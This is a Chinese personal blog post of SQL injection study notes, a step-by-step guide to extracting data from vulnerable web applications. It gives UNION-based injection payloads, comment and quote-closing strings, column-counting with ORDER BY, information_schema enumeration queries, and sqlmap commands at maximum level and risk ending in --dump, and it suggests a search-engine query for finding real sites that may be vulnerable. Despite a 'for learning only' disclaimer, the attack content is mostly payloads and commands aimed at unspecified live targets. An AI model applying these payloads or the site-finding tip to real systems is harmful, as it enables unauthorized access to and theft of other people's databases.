<!DOCTYPE html>
<html lang="cn">
    <head>
  <!-- 元数据 -->
  <meta charset="utf-8">
  <link rel="icon" href="/images/logo.webp">
  <title>SQL-injection | XKLibra</title>
  <meta name="author" content="XKLibra" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    <meta name="keywords" content="SQL, liunx kail, 网络攻防" />
  
  <meta name="description" content="SQL-INJECTION仅用于学习与交流，请不要拿来做违法的事情。   这是以我的笔记来写的，更新中……  建议浏览器安装的插件： Hackbar, HTTP header Live ,Omnibug , Tamper Data  在百度中搜索inurl:index.php?id&#x3D; 等等的网站可能有SQL漏洞 开始之前要知道以下内容：查找命令： 1234567891011121314S">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL-injection">
<meta property="og:url" content="http://example.com/2022/05/11/SQL-injection/index.html">
<meta property="og:site_name" content="XKLibra">
<meta property="og:description" content="SQL-INJECTION仅用于学习与交流，请不要拿来做违法的事情。   这是以我的笔记来写的，更新中……  建议浏览器安装的插件： Hackbar, HTTP header Live ,Omnibug , Tamper Data  在百度中搜索inurl:index.php?id&#x3D; 等等的网站可能有SQL漏洞 开始之前要知道以下内容：查找命令： 1234567891011121314S">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/images/logo.webp">
<meta property="article:published_time" content="2022-05-11T13:12:14.000Z">
<meta property="article:modified_time" content="2022-05-15T02:48:50.177Z">
<meta property="article:author" content="XKLibra">
<meta property="article:tag" content="网络攻防">
<meta property="article:tag" content="SQL">
<meta property="article:tag" content="liunx kail">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/logo.webp">
  
  <!-- 站点验证相关 -->
  
    
    
    
  
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" type="text/css" media="all">
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-color-dark.min.css" type="text/css" media="(prefers-color-scheme: dark)">
    <script src="/js/kr-dark.min.js"></script>
  
  
    <link rel="stylesheet" id="highlight-css" href="/css/highlight/night-eighties.min.css" type="text/css" media="all">
  
  
  <link rel="stylesheet" id="fontawe-css" href="https://unpkg.com/font-awesome@4.7.0/css/font-awesome.min.css" type="text/css" media="all">
  <link rel="stylesheet" id="nprogress-css" href="https://unpkg.com/nprogress@0.2.0/nprogress.css" type="text/css" media="all">
  
  
  
    <link rel="stylesheet" href="https://unpkg.com/aplayer@1.10.1/dist/APlayer.min.css">
  
  
    <link rel="stylesheet" href="https://unpkg.com/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="https://unpkg.com/jquery@3.6.0/dist/jquery.min.js"></script>
  
    <script src="https://unpkg.com/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
  <style>
    
      .kratos-cover.kratos-cover-2 {
        background-image: url('/images/banner.webp');
      }
    
    
      @media(min-width:768px) {
        body.custom-background {
          background-image: url('/images/bg.webp');
        }
      }
    
  </style>
  
<meta name="generator" content="Hexo 6.1.0"><link rel="alternate" href="/atom.xml" title="XKLibra" type="application/atom+xml">
</head>


    <body class="custom-background">
        <div id="kratos-wrapper">
    <div id="kratos-page">
        <div id="kratos-header">
            <header id="kratos-desktop-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="nav-header">
                        <nav id="kratos-menu-wrap">
                            <ul id="kratos-primary-menu" class="sf-menu">
                                
                                    
                                        <li><a href="/"><i class="fa fa-home"></i>首页</a></li>
                                    
                                
                                    
                                        <li><a href="/archives/"><i class="fa fa-file"></i>档案馆</a></li>
                                    
                                
                                    
                                        <li><a href="/friends/"><i class="fa fa-paw"></i>好伙伴</a></li>
                                    
                                
                                    
                                        <li>
                                            <a><i class="fa fa-link"></i>链接</a>
                                            <ul class="sub-menu">
                                                
                                                    
                                                
                                                    
                                                        <li><a target="_blank" rel="noopener" href="https://xklibra.github.io/">XKLibra-Blog</a></li>
                                                    
                                                
                                                    
                                                        <li><a target="_blank" rel="noopener" href="https://github.com/XKLibra/XKLibra.github.io">XKLibra <br> Github主页</a></li>
                                                    
                                                
                                            </ul>
                                        </li>
                                    
                                
                                    
                                        <li><a target="_blank" rel="noopener" href="https://svannu-msco-mto-l1.cloud"><i class="fa fa-paper-plane"></i>CCCP-sites</a></li>
                                    
                                
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
            <header id="kratos-mobile-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="color-logo"><a href="/">XKLibra</a></div>
                    <div class="nav-toggle">
                        <a class="kratos-nav-toggle js-kratos-nav-toggle">
                            <i></i>
                        </a>
                    </div>
                </div>
            </header>
        </div>
        <div class="kratos-start kratos-hero-2">
            <!-- <div class="kratos-overlay"></div> -->
            <div class="kratos-cover kratos-cover-2 text-center">
                <div class="desc desc2 animate-box">
                    <a href="/">
                        <h2>XKLibra</h2> <br />
                        <span>喵~</span>
                    </a>
                </div>
            </div>
        </div>

        <div id="kratos-blog-post">
            <div class="container">
                <div id="main" class="row">
                    

        

            <section class="col-md-8">

        

            <article itemscope itemtype="https://schema.org/Article">
    
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/05/11/SQL-injection/">
    <div class="kratos-hentry kratos-post-inner clearfix">
        <header class="kratos-entry-header">
            
                <h1 class="kratos-entry-title text-center" itemprop="name headline">SQL-injection</h1>
            
            
            <ul class="kratos-post-meta text-center">
                <li><time datetime="2022-05-11T13:12:14.000Z" itemprop="datePublished"><i class="fa fa-calendar"></i> 2022-05-11</time></li>
                <li itemprop="author" itemscope itemtype="https://schema.org/Person">
                    <i class="fa fa-user"></i> 作者 <span itemprop="name">XKLibra</span>
                </li>
                <li>
                    <i class="fa fa-edit"></i> 
                    
                    
                        ~3.56K
                    
                    字
                </li>
                
                    <li id="/2022/05/11/SQL-injection/" class="leancloud_visitors" data-flag-title="SQL-injection">
                        <i class="fa fa-eye"></i>
                        <span class="leancloud-visitors-count"> </span> 次阅读
                    </li>
                    
                
            </ul>
        </header>
        <div class="kratos-post-content">
            <div id="expire-alert" class="alert alert-warning hidden" role="alert">
                <div class="icon"><i class="fa fa-warning"></i></div>
                <div class="text"><p>本文最后编辑于 <time datetime="1652582930177"></time> 前，其中的内容可能需要更新。</p></div>
            </div>
            
                <div class="kratos-post-inner-toc">
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL-INJECTION"><span class="toc-number">1.</span> <span class="toc-text">SQL-INJECTION</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B%E4%B9%8B%E5%89%8D%E8%A6%81%E7%9F%A5%E9%81%93%E4%BB%A5%E4%B8%8B%E5%86%85%E5%AE%B9%EF%BC%9A"><span class="toc-number">1.1.</span> <span class="toc-text">开始之前要知道以下内容：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E6%B3%A8%E5%85%A5"><span class="toc-number">1.2.</span> <span class="toc-text">如何判断是否可以注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E6%98%AF%E4%BB%80%E4%B9%88%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-number">1.3.</span> <span class="toc-text">如何判断是什么数据库</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%BA%93%E5%90%8D"><span class="toc-number">1.4.</span> <span class="toc-text">获取库名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E8%A1%A8%E5%90%8D"><span class="toc-number">1.5.</span> <span class="toc-text">获取表名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%88%97%E5%90%8D"><span class="toc-number">1.6.</span> <span class="toc-text">获取列名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE"><span class="toc-number">1.7.</span> <span class="toc-text">获取数据</span></a></li></ol></li></ol>
                </div>
            
            <hr />
            <div itemprop="articleBody"><h1 id="SQL-INJECTION"><a href="#SQL-INJECTION" class="headerlink" title="SQL-INJECTION"></a>SQL-INJECTION</h1><div class="alert alert-warning"><div class="icon"><i class="fa fa-warning"></i></div><div class="text"><p>仅用于学习与交流，请不要拿来做违法的事情。</p>
</div></div>

<div class="alert alert-primary"><div class="icon"><i class="fa fa-refresh"></i></div><div class="text"><p>这是以我的笔记来写的，更新中……</p>
</div></div>
<p><strong>建议浏览器安装的插件：</strong></p>
<pre><code>Hackbar, HTTP header Live ,Omnibug , Tamper Data
</code></pre>
<p>在百度中搜索inurl:index.php?id&#x3D; 等等的网站可能有SQL漏洞</p>
<h2 id="开始之前要知道以下内容："><a href="#开始之前要知道以下内容：" class="headerlink" title="开始之前要知道以下内容："></a><strong>开始之前要知道以下内容：</strong></h2><p><strong>查找命令：</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SHOW</span> dtatbases;                   #列出数据库列表</span><br><span class="line"><span class="keyword">SHOW</span> tables;                      #显示指定数据库的所有表</span><br><span class="line"><span class="keyword">SHOW</span> columns <span class="keyword">from</span> [Name];         #查看指定数据表的属性，属性类型，主键信息 ，是否<span class="keyword">NULL</span>，默认值等其他信息</span><br><span class="line"><span class="keyword">SHOW</span> index <span class="keyword">from</span> [Name];   # 显示数据表的详细索引信息，包括主键。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">Select</span> schema_name <span class="keyword">from</span> information_schema.SCHEMATA;   # 列出数据库列表</span><br><span class="line"></span><br><span class="line"><span class="keyword">Select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;库NAME&#x27;</span>  #显示指定数据库的所有表</span><br><span class="line"></span><br><span class="line"><span class="keyword">Select</span> column_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;库NAME&#x27;</span> <span class="keyword">and</span> table_name<span class="operator">=</span><span class="string">&#x27;[Name]&#x27;</span>  </span><br><span class="line"># 查看指定数据表的属性，属性类型，主键信息 ，是否<span class="keyword">NULL</span>，默认值等其他信息</span><br><span class="line"></span><br><span class="line"><span class="keyword">Select</span> [你查到的列（有几个写几个）] <span class="keyword">from</span> [表名]</span><br></pre></td></tr></table></figure>

<p><strong>填充语句：</strong></p>
<p><code>SQL语句，[字段数]，[字段数2]，……  //查到几个写几个</code></p>
<p><strong>SQL注释：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#x27;#&#x27;</span><br><span class="line">&#x27;-- &#x27;</span><br><span class="line">&#x27;--+&#x27; //payload</span><br></pre></td></tr></table></figure>

<p><strong>多行数据变一行的查看命令:</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># Limit <span class="number">0</span>,<span class="number">1</span>,…..   <span class="operator">/</span><span class="operator">/</span>慢一点</span><br><span class="line"># 将<span class="keyword">Select</span> table_name ….. 改为 <span class="keyword">Select</span> <span class="keyword">Select</span> group_concat(XXXX_name) <span class="comment">--+PS</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">Select</span> group_concat(table_name) <span class="keyword">from</span> information_schema.TABLES <span class="keyword">where</span> TABLE_SCHEMA<span class="operator">=</span><span class="string">&#x27;库名&#x27;</span> <span class="comment">--+  //获取表名</span></span><br><span class="line"><span class="keyword">Select</span> group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> TABLE_SCHEMA<span class="operator">=</span><span class="string">&#x27;库名&#x27;</span> <span class="keyword">and</span> tab_name<span class="operator">=</span><span class="string">&#x27;表名&#x27;</span> <span class="comment">--+  //获取列名</span></span><br><span class="line"><span class="keyword">Select</span> group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata <span class="comment">--+//列出数据库</span></span><br></pre></td></tr></table></figure>

<p><strong>查询字段 <code>order by [num]</code>:</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Select</span> <span class="operator">*</span> <span class="keyword">from</span> XXXX <span class="keyword">order</span> <span class="keyword">by</span> [num]</span><br><span class="line"><span class="keyword">order</span> <span class="keyword">by</span> [num]  #DO it</span><br></pre></td></tr></table></figure>

<pre><code>UNM = 自然数 1-9 等

在用户名输入order by [1 - X]可查询有几个字段

如果报错说明没有,如果没有报错说明有
</code></pre>
<p><strong>Union拼接语句:</strong></p>
<pre><code>union可将两条SQL语句同时执行
</code></pre>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Select</span> <span class="operator">*</span> <span class="keyword">from</span> XXXXX <span class="keyword">where</span> <span class="keyword">user</span> <span class="operator">=</span> <span class="string">&#x27;-1&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> database(), <span class="number">1</span> # <span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>

<p><strong>闭合:</strong></p>
<pre><code>将SQL语句进行闭合
</code></pre>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&#x27;</span><br><span class="line">&quot;&quot;</span><br><span class="line">(&#x27;&#x27;)</span><br><span class="line">#PS:写 -1 在user中是为了防止SQL语句的干扰，当然看情况也可以不写</span><br><span class="line">Select * from XXXXX where user = &#x27; -1 union select database(), 1 &#x27; and password= &#x27;&#x27;# Run ERRAR</span><br><span class="line"></span><br><span class="line">Select * from XXXXX where user = &#x27;-1&#x27; union select database(), 1 # &#x27;and password=&#x27;&#x27;# Run yse</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>SQLMAP基础使用</strong></p>
<p>常用命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u [&quot;URL&quot;]</span><br><span class="line">sqlmap -u [&quot;URL&quot;] --current-db	//获取当前库名</span><br><span class="line">sqlmap -u [&quot;URL&quot;] --level=5 --risk=3 --dbs //获取所有库名</span><br><span class="line">sqlmap -u [&quot;URL&quot;] --level=5 --risk=3 --dbms=[数据库类型] -D &quot;[库名]&quot; --tables	//获取某一个库的所有表名</span><br><span class="line">sqlmap -u [&quot;URL&quot;] --level=5 --risk=3 --dbms=[数据库类型] -D &quot;[库名]&quot; -T &quot;[表名]&quot; --col	//获取某一个库某一个表的所有列名</span><br><span class="line">sqlmap -u [&quot;URL&quot;] --level=5 --risk=3 --dbms=[数据库类型] -D &quot;[库名]&quot; -T &quot;[表名]&quot; -C &quot;[列名1],[列名2]&quot; --dump	//获取所有的数据</span><br></pre></td></tr></table></figure>

<p><code>risk</code>为风险系数，<code>level</code>为攻击等级 &#x2F;&#x2F;慎重修改</p>
<p><strong>大致过程</strong></p>
<ol>
<li>如何判断是否可以注入</li>
<li>如何判断是什么数据库</li>
<li>获取库名</li>
<li>获取表名</li>
<li>获取列名</li>
<li>获取数据</li>
</ol>
<hr>
<h2 id="如何判断是否可以注入"><a href="#如何判断是否可以注入" class="headerlink" title="如何判断是否可以注入"></a>如何判断是否可以注入</h2><pre><code>在URL的后面加上?id=1&#39; 或者 ?id=1&#39; and 1=1 输入并回车，
</code></pre>
<p>然后输入?id&#x3D;1’ and 1&#x3D;2 再回车，查看是否有变化</p>
<p>PS: HTTPS⑧行，HTTP彳亍</p>
<h2 id="如何判断是什么数据库"><a href="#如何判断是什么数据库" class="headerlink" title="如何判断是什么数据库"></a>如何判断是什么数据库</h2><pre><code>在URL的后面加上?id=1&#39;看报错是否是SQL一类的

或者使用sqlmap等工具，例如：
</code></pre>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap - u [URL]</span><br></pre></td></tr></table></figure>

<h2 id="获取库名"><a href="#获取库名" class="headerlink" title="获取库名"></a>获取库名</h2><p>开始前要查询字段有多少</p>
<p>一般查库：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://[URL]?id=1&#x27; union select database() --+</span><br></pre></td></tr></table></figure>

<p>SQLMAP工具查库：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u [&quot;URL&quot;] --current-db</span><br></pre></td></tr></table></figure>

<h2 id="获取表名"><a href="#获取表名" class="headerlink" title="获取表名"></a>获取表名</h2><p>一般查表:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Select</span> group_concat(table_name) <span class="keyword">from</span> information_schema.TABLES <span class="keyword">where</span> TABLE_SCHEMA<span class="operator">=</span><span class="string">&#x27;库名&#x27;</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>SQLMAP工具：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u [&quot;URL&quot;] --level=5 --risk=3 --dbsms=[什么数据库] -D &quot;[库名]&quot; --tables</span><br></pre></td></tr></table></figure>

<h2 id="获取列名"><a href="#获取列名" class="headerlink" title="获取列名"></a>获取列名</h2><p>一般查列:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Select</span> group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> TABLE_SCHEMA<span class="operator">=</span><span class="string">&#x27;库名&#x27;</span> <span class="keyword">and</span> table_name<span class="operator">=</span><span class="string">&#x27;表名&#x27;</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>SQLMAP工具：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u [&quot;URL&quot;] --level=5 --risk=3 --dbsms=[什么数据库] -D &quot;[库名]&quot; -T &quot;[表名]&quot; --col	//获取某一个库某一个表的所有列名</span><br></pre></td></tr></table></figure>

<h2 id="获取数据"><a href="#获取数据" class="headerlink" title="获取数据"></a>获取数据</h2><p>一般获取数据:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Select</span> [你查到的列（有几个写几个）] <span class="keyword">from</span> [表名]</span><br></pre></td></tr></table></figure>

<p>SQLMAP工具：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u [&quot;URL&quot;] --level=5 --risk=3 --dbsms=[什么数据库] -D &quot;[库名]&quot; -T &quot;[表名]&quot; -C &quot;[列名1],[列名2]&quot; --dump</span><br></pre></td></tr></table></figure>
</div>
        </div>
        
            <div class="kratos-copyright text-center clearfix">
                <h5 itemprop="copyrightNotice">本作品采用 <a rel="license nofollow" target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
            </div>
        
        <footer class="kratos-entry-footer clearfix">
            
                <div class="post-like-donate text-center clearfix" id="post-like-donate">
                
                
                    <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                    <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "http://example.com/2022/05/11/SQL-injection/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "http://example.com/2022/05/11/SQL-injection/";
            const title         = "「SQL-injection」";
            const excerpt       = `SQL-INJECTION仅用于学习与交流，请不要拿来做违法的事情。


这是以我的笔记来写的，更新中……

建议浏览器安装的插件：
Hackbar, HTTP header Live ,Omnibug , Tamper Data

...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                
                </div>
            
            <div class="footer-tag clearfix">
                <div class="pull-left">
                <i class="fa fa-tags"></i>
                    <a class="tag-none-link" href="/tags/SQL/" rel="tag">SQL</a>, <a class="tag-none-link" href="/tags/liunx-kail/" rel="tag">liunx kail</a>, <a class="tag-none-link" href="/tags/%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2/" rel="tag">网络攻防</a>
                </div>
                <div class="pull-date">
                    <time datetime="2022-05-15T02:48:50.177Z" itemprop="dateModified">最后编辑：2022-05-15</time>
                </div>
            </div>
        </footer>
    </div>
    
        <nav class="navigation post-navigation clearfix" role="navigation">
            
            <div class="nav-previous clearfix">
                <a title=" SQL" href="/2022/05/11/SQL/">&lt; 上一篇</a>
            </div>
            
            
        </nav>
    
    
        <div id="v-comments" class="post-comments bg-image"></div>
<script>
    var load_comm = () => {
        const init = () => {
            new Valine({
                el: '#v-comments',
                appId: 'bBWUHD9X6EHhimwN19Ag3t5K-MdYXbMMI',
                appKey: '0YpBzBVjx6Hpv6CXKeYmMkkV',
                visitor: true,
                enableQQ: false,
                path: '/2022/05/11/SQL-injection/'
            });
        }
        if (typeof Valine === 'undefined') {
            const src = 'https://unpkg.com/valine/dist/Valine.min.js';
            $.getScript(src, init);
        } else {
            init();
        }
    };
</script>
<noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="https://valine.js.org/">comments powered by Valine.</a></noscript>

    
</article>

        

            </section>

        

                
            

<section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
    <!-- 文章和页面根据splitter来分割，没有的话就从头开始设置为sticky -->
    
    
                <aside id="krw-about" class="widget widget-kratos-about clearfix">
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/images/me.webp" />
        </div>
    </div>
    <div class="textwidget">
        <p class="text-center">Do what have to do, <br> Wali what have to walk.</p>
    </div>
    <div class="site-meta">
        <a class="meta-item" href="/archives/">
            <span class="title">
                文章
            </span>
            <span class="count">
                5
            </span>
        </a>
        <a class="meta-item" href="/categories/">
            <span class="title">
                分类
            </span>
            <span class="count">
                3
            </span>
        </a>
        <a class="meta-item" href="/tags/">
            <span class="title">
                标签
            </span>
            <span class="count">
                13
            </span>
        </a>
    </div>
</aside>
            
                    <div class="sticky-area">
                
                    <aside id="krw-toc" class="widget widget-kratos-toc clearfix">
    <div class="photo-background"></div>
    <h4 class="widget-title no-after">
        <i class="fa fa-compass"></i>
        文章目录
        <span class="toc-progress-bar" role="progressbar" aria-label="阅读进度："></span>
    </h4>
    <div class="textwidget">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL-INJECTION"><span class="toc-text">SQL-INJECTION</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B%E4%B9%8B%E5%89%8D%E8%A6%81%E7%9F%A5%E9%81%93%E4%BB%A5%E4%B8%8B%E5%86%85%E5%AE%B9%EF%BC%9A"><span class="toc-text">开始之前要知道以下内容：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E6%B3%A8%E5%85%A5"><span class="toc-text">如何判断是否可以注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E6%98%AF%E4%BB%80%E4%B9%88%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-text">如何判断是什么数据库</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%BA%93%E5%90%8D"><span class="toc-text">获取库名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E8%A1%A8%E5%90%8D"><span class="toc-text">获取表名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%88%97%E5%90%8D"><span class="toc-text">获取列名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE"><span class="toc-text">获取数据</span></a></li></ol></li></ol>
    </div>
</aside>
                
                
  <aside id="krw-categories" class="widget widget-kratos-categories clearfix">
    <h4 class="widget-title"><i class="fa fa-folder"></i>分类目录</h4>
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%94%BB%E9%98%B2%E6%95%99%E7%A8%8B/">攻防教程</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%95%99%E7%A8%8B/">教程</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%97%A5%E5%B8%B8/">日常</a><span class="category-list-count">1</span></li></ul>
  </aside>


            
                
  <aside id="krw-tags" class="widget widget-kratos-tags clearfix">
    <h4 class="widget-title"><i class="fa fa-tags"></i>标签聚合</h4>
      <div class="tag-clouds">
        <a href="/tags/CSS/" style="font-size: 0.6em;">CSS</a> <a href="/tags/HTML/" style="font-size: 0.6em;">HTML</a> <a href="/tags/Java/" style="font-size: 0.6em;">Java</a> <a href="/tags/NEW-WROLD/" style="font-size: 0.6em;">NEW WROLD</a> <a href="/tags/SER/" style="font-size: 0.8em;">SER</a> <a href="/tags/SQL/" style="font-size: 0.8em;">SQL</a> <a href="/tags/WEB/" style="font-size: 0.6em;">WEB</a> <a href="/tags/Windows/" style="font-size: 0.6em;">Windows</a> <a href="/tags/liunx/" style="font-size: 0.6em;">liunx</a> <a href="/tags/liunx-kail/" style="font-size: 0.6em;">liunx kail</a> <a href="/tags/%E5%91%BD%E4%BB%A4/" style="font-size: 0.6em;">命令</a> <a href="/tags/%E6%97%A5%E5%B8%B8/" style="font-size: 0.6em;">日常</a> <a href="/tags/%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2/" style="font-size: 0.6em;">网络攻防</a>
      </div>
  </aside>

            
                
  <aside id="krw-posts" class="widget widget-kratos-posts">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
        
          
          
